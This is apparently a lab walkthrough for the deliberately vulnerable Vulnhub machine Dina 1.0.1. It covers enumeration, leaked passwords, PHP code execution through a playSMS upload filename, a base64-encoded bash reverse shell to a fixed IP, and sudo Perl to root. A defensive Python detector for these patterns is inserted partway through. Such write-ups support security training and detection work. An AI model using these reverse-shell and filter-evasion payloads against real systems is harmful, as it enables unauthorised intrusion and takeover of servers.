This post is a walkthrough for Dina 1.0.1 on Vulnhub.
Dina uses DHCP, so you'll have to figure out what its IP is. Running netdiscover -r IPRANGE will help you with that.
The first thing to do is run an nmap scan: nmap -sC -sV -v IPADDRESS -oN OUTPUTFILE
There's not much to go on except a web server. The scan does list the directories from the robots.txt file. Let's go to the webpage and see what's there.
Not much here, even when looking at the source. Let's try some of the robots.txt directories.
This is not a normal error message. Let’s look at the source.
Ok, so this is interesting. Somebody thought it was a great idea to put a bunch of passwords in the source of the webpage. This is a very simple example of security by obscurity, and it doesn't work. Unfortunately, we don't have anything to try the passwords on yet. The other robots.txt directories didn't turn up anything. Let's do some more enumeration.
Running nikto on the site (nikto -h IPADDRESS) gives us some more directories to look at. One of them is called secure … that might be interesting.
Inside the secure directory is a file called backup.zip. I couldn’t unzip it with native Kali tools, so I put it in Windows and used 7zip. It prompts for a password. Luckily, we have a few to try.
The first password in the list (freedom) worked and I was able to extract the mp3 file. Sometimes in CTFs, they put challenges into audio files. I was all prepared with my audio editor except the file wouldn’t load. It wasn’t an mp3.
Running file against the mp3 revealed that it was just a text file.
I renamed the file to a text file and took a look at it.
This gives us a user name and a new url with a login. Let’s check it out!
On the page is something called playSMS. Using the username touhid and running through the password list from earlier, I was able to log in with the password diana.
At this point, I looked for places to upload files or code. There was one place that allowed a file upload, but the file itself never really wrote to the system. I went to Google and searched for playSMS exploits and found one in Exploit-DB. There are also two Metasploit modules that work on this VM. The manual way is more interesting though, so I'm going to show that method. If you can't get it to work, go the Metasploit route.
The key here is the filename. After the upload, the system will display the filename. If the filename contains php code, the code will execute. In the example they are running the system command uname -a. Let’s try it and see what happens.
Now we have code execution! The only problem is that slashes (/) are not allowed in filenames. That makes it really hard to get a reverse shell. The system does have netcat, but it's not a version with the gaping security hole (the -e flag). The solution is to encode the command string and get the system to decode and run it on the other side.
First, let’s find a reverse shell to use. I used this from pentestmonkey: bash -i >& /dev/tcp/192.168.2.30/7777 0>&1
Now echo that into base64: echo "bash -i >& /dev/tcp/192.168.2.30/7777 0>&1" | base64
This gave me YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== as the encoded string. Yours will be different based on the IP address and port number.
So now we have an encoded string that should give us a reverse shell. Now we need to set up the filename to decode and run it on the other end.
Inside the single quotes where we had uname -a, we’re going to replace that with: echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== | base64 -d | bash
What we're doing is echoing the string, piping it into base64 (decoding it with the -d flag), and finally piping the decoded string to bash for execution.
Now we need to get our listener set up: nc -nlvp 7777
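From the defender's side, the two things worth alerting on in this upload-to-shell chain are PHP tags arriving in an uploaded filename and a base64 blob being decoded straight into a shell. The following is an added example, not code from the original post: it scans a few constructed upload and process-execution events (the key="value" event format and the sample lines are my own assumptions) and decodes any base64 token it finds so the hidden reverse-shell string shows up in the finding.

```python
import base64
import re

# Constructed sample events (not from the original post): one upload-filename
# record or one process-execution record per line, in a simple key="value" form.
SAMPLE_EVENTS = [
    'upload filename="report.pdf"',
    'upload filename="x<?php system(\'uname -a\'); ?>.jpg"',
    'exec cmd="ls -la /var/www"',
    'exec cmd="echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== | base64 -d | bash"',
]

EVENT = re.compile(r'^(upload|exec)\s+\w+="(.*)"$')
PHP_IN_NAME = re.compile(r"<\?(php|=)|\b(system|exec|passthru|shell_exec)\s*\(", re.I)
DECODE_TO_SHELL = re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba|z|da)?sh\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
SHELL_INDICATORS = re.compile(r"/dev/tcp/|\bbash -i\b|\bnc\b.*-e|\bncat\b.*-e")


def decoded_payloads(cmd):
    """Decode every base64-looking token in a command line; skip tokens that are not valid base64."""
    out = []
    for token in B64_TOKEN.findall(cmd):
        try:
            out.append(base64.b64decode(token, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: bad padding or alphabet
            pass
    return out


def classify(line):
    """Return a list of (rule, evidence) tuples for one event line; empty list if benign."""
    m = EVENT.match(line)
    if not m:
        return []
    kind, value = m.groups()
    findings = []
    if kind == "upload" and PHP_IN_NAME.search(value):
        findings.append(("php_code_in_filename", value))
    if kind == "exec":
        if SHELL_INDICATORS.search(value):
            findings.append(("reverse_shell_indicator", value))
        if DECODE_TO_SHELL.search(value):
            findings.append(("base64_decode_to_shell", value))
            # Surface what the decoded blob actually runs, not just that decoding happened.
            for payload in decoded_payloads(value):
                if SHELL_INDICATORS.search(payload):
                    findings.append(("decoded_reverse_shell", payload.strip()))
    return findings


def scan(lines):
    """Scan all events; returns {line_index: findings} for lines that triggered a rule."""
    return {i: hits for i, hits in ((i, classify(l)) for i, l in enumerate(lines)) if hits}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        for rule, evidence in hits:
            print(f"line {idx}: {rule}: {evidence}")
```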
Once the file is uploaded, we get a shell!
The first thing I do after this is spawn a better shell: python -c 'import pty; pty.spawn("/bin/sh")'
Now I can do things like sudo. Let’s check our sudo permissions with sudo -l.
This is awesome! We can run Perl commands as root. Googling for reverse shells, I easily found this one using Perl: perl -e 'exec "/bin/bash";'
The only change is that we'll have to use the full path to Perl, as listed by sudo -l, for this to work.
Navigating to the root directory and viewing the root flag is now possible.
That's the box. It was definitely beginner level, especially if using Metasploit. Hopefully you found it helpful.
If you want to see a video walkthrough where I also show the Metasploit path, you can view it here on YouTube.